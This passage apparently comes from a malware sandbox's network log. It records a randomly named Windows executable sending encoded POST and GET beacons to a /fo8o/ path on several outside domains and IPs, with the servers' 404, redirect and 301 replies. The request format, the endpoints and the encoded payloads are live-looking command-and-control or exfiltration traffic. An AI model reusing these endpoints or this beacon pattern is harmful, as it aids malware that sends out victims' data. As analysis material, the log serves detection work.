            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            31 | 192.168.2.6 | 49761 | 195.110.124.133 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:48.630045891 CEST | 1841 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.elettrosistemista.zip
            Origin: http://www.elettrosistemista.zip
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.elettrosistemista.zip/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 4b 45 6d 4a 69 66 2f 6c 61 30 52 55 6f 71 73 39 59 75 50 4b 61 30 34 35 6f 58 44 76 4a 72 39 54 6f 4b 68 32 75 48 2b 75 48 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 62 54 36 47 39 65 70 54 43 41 32 44 30 2b 48 4f 52 30 2f 61 35 73 62 33 65 54 58 39 46 58 6d 53 30 46 41 37 63 52 76 47 69 43 72 6e 69 79 61 79 78 6a 59 54 77 75 42 64 6d 69 42 56 62 6c 74 6d 7a 6b 6f 59 76 2f 6b 74 6a 34 2b 54 42 6a 65 6b 46 70 [TRUNCATED]
            Data Ascii: blWd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWKEmJif/la0RUoqs9YuPKa045oXDvJr9ToKh2uH+uHZ5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqbT6G9epTCA2D0+HOR0/a5sb3eTX9FXmS0FA7cRvGiCrniyayxjYTwuBdmiBVbltmzkoYv/ktj4+TBjekFpdHNzeNHxy9Pcw24vdDItt+e8WTbZ9URuazYWsp568/f0yKCjRfcltj/CA1fR61rMc9wdk4KaradY6Pdc7076uQy+eLO0Q7KYt/TQgmZS3EbjuUCmO3rbsQ1pg9d4mkADNwjYqc53IOT7JXCtaQXK99mv+mn+8LZPNINpu+Qxsl1QHCywTU7xudlwhT8JJRRErNA2xxuNbLuFFABdhBU1HJ7stU7WFTyLLMWe48zP3XOe1lGfqBSFn9lU+mJOWFkDenbEMP2uzR6vx3qmt02agNXgQMf433nniF72arU/+HzfMx3jHkODTNmUud0+TuZwgo8waZmP+Lk5pBsgRWXcZ3Sbk0ZdOcgtB9mqWbW8TV3q2k+2jaWmoHGYnEgXqbQpn9V6ujEY+nrii6iZI3iPk9fxDRDpw02r9pwl7b0gP/uQMCVDbXc8focD0by28eXd4VXTGobiMOnUYVo4z2TFUUFP+aM/5oOhDjlxawgNSNEHkwsgBuyeOrKEXNOhnzk6R0jzAkXvJCu5eMpVQV3ari5ZVVbWHpxc+q1ZKrPTWm5T9YSJR1aNzgCyM/vpEdo39GOX49YKRPj1lUtwqc6YNKe3Bp+KVtkNYcP6JmvgTk0HTczTJZunfRUgRAQjzoxmITZTBJgAFKZjg0Bv8ZGbFgEA1eLCJASFLd [TRUNCATED]
            Aug 2, 2024 13:52:49.336429119 CEST | 367 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:49 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            32 | 192.168.2.6 | 49762 | 195.110.124.133 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:51.165463924 CEST | 532 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.elettrosistemista.zip
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:52:51.871396065 CEST | 367 | IN | HTTP/1.1 404 Not Found
            Date: Fri, 02 Aug 2024 11:52:51 GMT
            Server: Apache
            Content-Length: 203
            Connection: close
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            33 | 192.168.2.6 | 49763 | 15.197.240.20 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:57.411190987 CEST | 798 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.donnavariedades.com
            Origin: http://www.donnavariedades.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.donnavariedades.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 49 35 67 38 45 2f 39 70 39 35 6e 63 76 6d 35 51 55 38 4a 4f 34 30 59 59 6f 38 35 5a 77 34 37 77 67 71 75 79 7a 5a 64 73 79 66 74
            Data Ascii: blWd=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDpI5g8E/9p95ncvm5QU8JO40YYo85Zw47wgquyzZdsyft


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            34 | 192.168.2.6 | 49764 | 15.197.240.20 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:52:59.943882942 CEST | 822 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.donnavariedades.com
            Origin: http://www.donnavariedades.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.donnavariedades.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 55 61 59 71 6b 4c 5a 51 34 52 79 67 53 75 67 6b 56 36 6a 47 36 4f 6d 69 6f 6b 53 65 55 43 6f 42 5a 58 7a 6e 55 52 42 77 46 63 4f 41 3d 3d
            Data Ascii: blWd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoUaYqkLZQ4RygSugkV6jG6OmiokSeUCoBZXznURBwFcOA==


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            35 | 192.168.2.6 | 49765 | 15.197.240.20 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:02.474021912 CEST | 1835 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.donnavariedades.com
            Origin: http://www.donnavariedades.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.donnavariedades.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 4e 51 43 65 61 4b 50 46 6f 58 4a 72 49 32 59 5a 45 2b 43 47 30 56 38 6a 75 47 70 6e 51 50 39 55 6d 6d 39 47 6b 54 47 4d 4e 75 6f 42 35 5a 34 57 55 66 58 41 41 44 64 48 6e 4e 47 2b 62 57 39 71 43 2b 4d 35 46 79 33 72 65 72 30 4b 67 54 48 56 47 63 33 32 68 30 6a 56 33 70 44 55 67 69 67 74 65 55 32 2b 77 6e 4d 46 36 70 6b 47 77 69 58 50 4d 56 73 6e 66 7a 45 64 69 48 7a 62 38 74 4a 33 6c 59 4f 2b 74 34 4d 4d 54 78 76 37 49 4f 43 50 59 77 71 42 4d 76 6b 4d 34 61 34 4e 57 79 66 4e 79 4c 55 [TRUNCATED]
            Data Ascii: blWd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/NQCeaKPFoXJrI2YZE+CG0V8juGpnQP9Umm9GkTGMNuoB5Z4WUfXAADdHnNG+bW9qC+M5Fy3rer0KgTHVGc32h0jV3pDUgigteU2+wnMF6pkGwiXPMVsnfzEdiHzb8tJ3lYO+t4MMTxv7IOCPYwqBMvkM4a4NWyfNyLUo3daVh963mW3GTg3u4mSS2ECnzTs/FrMzIyRxPgiE+/3MxguOZra2PFuuiPpvLORb2gBCWu7kBJlhECqd9P2zpqBr1sQHFR1rJzr+CHFjbM5xGnvyFoCenp6+Nv/ulEJDdsjNR5MfmLdk1aQNGJiVvIJQH43+2rtb0Z97HNL8AnaIwb94+dipdj+xLgE+IGsdJI5vENcGD+3I+x4o6fRklMLazVz33QU6UIXt3sq3CpyvbX/033E4TB19ZKyvvWensIPjg//22mA1QKxA0cKncQQyiU9ZiQya9T0eYl9ikuNAvpepGd+bgL3mKOu7LpnEowAp1WJ1vrxVXFI8CaVD3oN48hfr0SATtF3oiL7LNxCb8ay72SZt7H0UlynJrsHFPAI25eQ6ZJzUMGNc9F5iE9ShzmbksHkq516/uiveVVsPs1FegxAD8Rm6yFT62yDRNcaevLNBMQZPzqcgbHe48A5cin9qXvMrPAeJcpXGNmcLR7h8KUcq/Ar82nnIAlIViTmYayBmiqnxdSaamLN3L5LbNiFSA6e8xORc+gsguK6LPQh5hFcNIBom91svWqpwib76a3xJDlY9Dnow6vj2ql9klsFNFPkm2C5mfMj5EeSCfGgddARKUMuFm7HiFRHPvWf3QSG3a6sB4NS6wJQaYSJU7j/SUIf/+ [TRUNCATED]


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            36 | 192.168.2.6 | 49766 | 15.197.240.20 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:05.004097939 CEST | 530 | OUT | GET /fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.donnavariedades.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:53:05.501517057 CEST | 414 | IN | HTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 02 Aug 2024 11:53:05 GMT
            Content-Type: text/html
            Content-Length: 274
            Connection: close
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 6c 57 64 3d 6c 2b 33 30 31 5a 76 49 54 43 78 61 58 39 41 48 6d 31 59 73 4c 36 35 35 6d 67 4f 54 39 75 66 4a 67 7a 63 74 4f 51 78 32 39 71 53 73 72 78 58 38 6b 77 34 39 79 6b 67 6d 75 6d 69 59 59 55 34 32 78 4d 47 78 56 69 67 35 4b 56 5a 72 4a 6f 73 50 62 73 39 70 43 54 47 31 64 6c 30 6e 39 5a 78 35 73 42 6f 76 58 71 6c 69 62 4c 47 2b 6f 54 51 67 43 5a 48 4d 41 31 41 46 34 78 66 64 53 5a 6b 4a 76 34 58 41 47 43 49 3d 26 49 78 65 3d 41 70 71 34 74 50 50 58 4e 64 54 70 32 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2"}</script></head></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            37 | 192.168.2.6 | 49767 | 217.196.55.202 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:19.022710085 CEST | 792 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.empowermedeco.com
            Origin: http://www.empowermedeco.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.empowermedeco.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f
            Data Ascii: blWd=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
            Aug 2, 2024 13:53:19.593957901 CEST | 1070 | IN | HTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:19 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            38 | 192.168.2.6 | 49768 | 217.196.55.202 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:21.558305979 CEST | 816 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.empowermedeco.com
            Origin: http://www.empowermedeco.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.empowermedeco.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
